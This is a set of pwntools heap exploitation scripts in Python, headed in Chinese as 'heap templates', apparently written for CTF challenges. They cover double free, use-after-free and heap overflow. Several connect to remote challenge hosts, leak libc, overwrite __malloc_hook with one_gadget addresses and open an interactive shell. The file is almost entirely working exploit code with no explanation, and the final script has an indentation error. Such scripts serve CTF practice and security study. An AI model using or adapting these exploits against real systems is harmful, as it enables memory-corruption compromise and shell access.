heap模板

double free

from pwn import *

context(arch='i386', log_level='debug', os='linux')

#p = process('./heap_Double_Free')
p=remote('123.60.135.228', 2056)

def fulltcache():
    for i in range(7):
        malloc(i, b'qwer')
    for i in range(7):
        free(i)

def malloc(id, contet):
    p.sendlineafter('root@ubuntu:~/Desktop$', b'1')
    p.sendlineafter('please input id and size :', str(id))
    sleep(0.1)
    p.sendline(b'100')
    p.sendlineafter('please input contet:', contet)

def free(id):
    p.sendlineafter('root@ubuntu:~/Desktop$', b'2')
    p.sendlineafter('please input id :', str(id))

def print(id):
    p.sendlineafter('root@ubuntu:~/Desktop$', b'3')
    p.sendlineafter('please input id :', str(id))


fulltcache()

malloc(1, b'qwer')
malloc(2, b'qwer')
malloc(3, b'qwer')


free(1)
free(2)
free(1)

#attach(p)
malloc(4,p64(0x006010A0))#可修改的内容在这个地址后16字节
malloc(5,b'qwer')
malloc(6,b'qwer')
malloc(7,p64(257))
p.interactive()

简单UAF

from pwn import *
context.log_level="debug"
io=process("hacknote")
io=remote("node4.buuoj.cn",27728)
def add(size,content):
    io.recvuntil("Your choice :")
    io.sendline("1")
    io.recvuntil("size :")
    io.sendline(str(size))
    io.recvuntil("Content :")
    io.sendline(content)

def delete(index):
    io.recvuntil("Your choice :")
    io.sendline("2")
    io.recvuntil("Index :")
    io.sendline(str(index))

def print_(index):
    io.recvuntil("Your choice :")
    io.sendline("3")
    io.recvuntil("Index :")
    io.sendline(str(index))
magic=0x08048945
add(30,"HAPPY")
add(30,"HAPPY")
delete(0)
delete(1)
add(8,p32(magic))
#gdb.attach(io)
#pause()
print_(0)
#gdb.attach(io)
#pause()
io.interactive()

from pwn import *
p=process('./pwn')
libc=ELF('./libc-2.27.so')

def menu():
        p.recvuntil(b'>> ')
def add(size):
        menu()
        p.sendline(b'1')
        p.recvuntil(b'book size:\n')
        p.sendline(str(size))
def edit(idx,con):
        menu()
        p.sendline(b'2')
        p.recvuntil(b'Book index:\n')
        p.sendline(str(idx))
        p.recvuntil(b'Provide book content:')
        p.sendline(con)
def show(idx):
        menu()
        p.sendline(b'4')
        p.recvuntil(b'index:')
        p.sendline(str(idx))
def free(idx):
        menu()
        p.sendline(b'3')
        p.recvuntil('Book index:\n')
        p.sendline(str(idx))
add(0x500)
add(0x80)
add(0x500)
free(0)
show(0)
p.recvuntil(b'OUTPUT:')
base=u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-4111520
one_gadget=base+0x4f2a5
print(hex(base))
free(1)
edit(1,p64(0x602110))
add(0x80)
add(0x80)
edit(4,p64(one_gadget))
p.sendline(b'17')
p.interactive()

uaf

from pwn import *

local = 1

binary = './UAF_glibc2.23'
libc_path = './libc-2.23.so'
port = 0

if local == 1:
    p = process(binary)

def dbg():
    context.log_level = 'debug'


def add(index, size, content):
    p.sendlineafter('>', '1')
    p.sendafter('index', str(index))
    p.sendafter('size', str(size))
    p.sendafter('content:', content)


def edit(index, content):
    p.sendlineafter('>', '2')
    p.sendafter('index', str(index))
    p.sendafter('content:', content)


def show(index):
    p.sendlineafter('>', '4')
    p.sendafter('index', str(index))


def free(index):
    p.sendlineafter('>', '3')
    p.sendafter('index', str(index))

message = "======================== LEAK LIBC ADDRESS ======================="
success(message)
add(2, 0x100, '2')
add(3, 0x10, 'protect')
free(2)
add(2, 0x30, 'aaaaaaaa')
show(2)
libc = ELF(libc_path)
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 344 - 0x10 - libc.sym['__malloc_hook']
__malloc_hook = libc_base + libc.sym['__malloc_hook']
success("libc:{}".format(hex(libc_base)))

message = "======================== FASTBIN ATTACK ======================="
success(message)
add(0, 0x60, 'aaaa')
free(0)
edit(0, p64(__malloc_hook - 0x23))
add(1,0x60,'a')
og = libc_base + 0xd5bf7
add(2,0x60,0x13 * b'\x00' + p64(og))


message = "======================== TRIGGER MALLOC HOOK ======================="
success(message)
p.sendlineafter('>', '1')
p.sendafter('index', '1')
p.sendafter('size', '1')

p.interactive()

2.27uaf

from struct import pack
context.log_level='debug'
context(os = 'linux', arch = 'amd64')

#p = process('./pwn')
p = remote('43.142.108.3', 28585)
elf = ELF('./pwn')
#libc = ELF('buu/libc-2.27-x64.so')
#libc = ELF('glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
libc = ELF('libc-2.27.so')

def debug():
	gdb.attach(p)
	pause()
def add(size, name, content):
	p.sendlineafter(b'Choice: \n', '1')
	p.sendlineafter(b'Size:\n', str(size))
	p.sendafter(b'Name: \n', name)
	p.sendafter(b'Content:\n', content)
def free(index):
	p.sendlineafter(b'Choice: \n', '2')
	p.sendlineafter(b'idx:\n', str(index))
def show(index):
	p.sendlineafter(b'Choice: \n', '3')
	p.sendlineafter(b'idx:\n', str(index))
def edit(index, content):
	p.sendlineafter(b'Choice: \n', '4')
	p.sendlineafter(b'idx:\n', str(index))
	p.send(content)
# leak libcbase
add(0x410, b'1', b'a') #index 0
add(0x20, b'1', b'a') #index 1
add(0x10, b'1', b'a') #index 2
free(0)
show(0)
libcbase = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10 - libc.sym['__malloc_hook']
print(' libcbase -> ', hex(libcbase))

# malloc_hook -> one_gadget
one_gadget = libcbase + 0x10a2fc
malloc_hook = libcbase + libc.sym['__malloc_hook']
free(1)
edit(1, p64(malloc_hook))
add(0x10, b'1', b'a') #index 3
add(0x20, b'1', b'a') #index 4
edit(4, p64(one_gadget))

# pwn
p.sendlineafter(b'Choice: \n', '1')
p.sendlineafter(b'Size:\n', b'10')
p.interactive()

from PwnModules import *

#io = process('./ez_uaf')
io = remote('node1.anna.nssctf.cn', 28894)
elf = ELF('./ez_uaf')
libc = ELF('/home/kaguya/PwnTool/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
context(arch='amd64', os='linux', log_level='debug')


def choice(idx):
    io.sendlineafter(b'Choice: \n', str(idx))


def add(size, name, content):
    choice(1)
    io.sendlineafter(b'Size:\n', str(size))
    io.sendlineafter(b'Name: \n', name)
    io.sendlineafter(b'Content:\n', content)


def free(idx):
    choice(2)
    io.sendlineafter(b'Input your idx:\n', str(idx))


def show(idx):
    choice(3)
    io.sendlineafter(b'Input your idx:\n', str(idx))


def edit(idx, content):
    choice(4)
    io.sendlineafter(b'Input your idx:\n', str(idx))
    io.sendline(content)


add(0x410, b'TST', b'TST')
add(0x10, b'TST', b'TST')
free(0)
show(0)
addr = leak_addr(2, io) - 0x3ebca0

print(hex(addr))
one_gadget = addr + 0x10a2fc
malloc_hook = addr + libc.sym['__malloc_hook']
free(1)
edit(1, p64(malloc_hook))
add(0x10, b'TST', b'TST')
add(0x10, b'TST', b'TST')
edit(3, p64(one_gadget))

choice(1)
io.sendlineafter(b'Size:\n', b'10')
io.interactive()

堆溢出

from pwn import *

def connetc():
    global p,elf,libc
    p=remote('192.168.109.168',10000)
    #p=process('./Emo_Chunk')
    elf=ELF('./Emo_Chunk')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#context.log_level='debug'
def add(size):
 p.sendlineafter("Please Choice!",'1')
 p.sendlineafter("Please Input Size:",str(size))

def dele(index):
 p.sendlineafter("Please Choice!",'2')
 p.sendlineafter("Please Input index:",str(index))

def show(index):
 p.sendlineafter("Please Choice!",'4')
 p.sendlineafter("Please Input index:",str(index))
def edit(index,content):
 p.sendlineafter("Please Choice!",'3')
 p.sendlineafter("Please Input index:",str(index))
 p.sendlineafter("Change EMo Content",content)
def pwn(i,j):
    add(0x68)#0
    add(0x68)#1
    add(0x68)#2
    add(0x68)#3
    add(0x68)#4
    add(0x68)#5
  
    edit(0,'a'*0x68 + '\xe1' + '\x00'*7)
  
    dele(1)
    add(0x68)
    show(2)
    p.recvuntil('\n')

    addr = u64(p.recv(6).ljust(8,'\x00'))
    print("addr : " + hex(addr-0x3c4b78))
  
    libc_addr = addr - 0x3c4b78
    dele(4)
    edit(3,'a'*0x68 + p64(0x71) + p64(libc_addr+libc.symbols['__malloc_hook']-0x23))
    print(hex(libc_addr+libc.symbols['__malloc_hook']-0x23))

    realloc_hook = libc_addr + libc.sym['__realloc_hook']
    log.info("realloc_hook:"+hex(realloc_hook))
    realloc = libc_addr + libc.sym['realloc']
    log.info("realloc:"+hex(realloc))
  
    add(0x68) #4

    add(0x68) #6
    one = [0x45226,0x4527a,0xf03a4,0xf1247]
    edit(6,cyclic(11)+p64(libc_addr+one[i]) + p64(realloc + j))
    add(0x30)

    p.interactive()
for i in range(4):
 for j in [0,2,4,6,8,10,13,16,20]:
     try:
      print("i :",i)
      print("j :",j)
      connetc()
      pwn(i,int(j))
          p.close()
     except :
      print("...")
      p.close()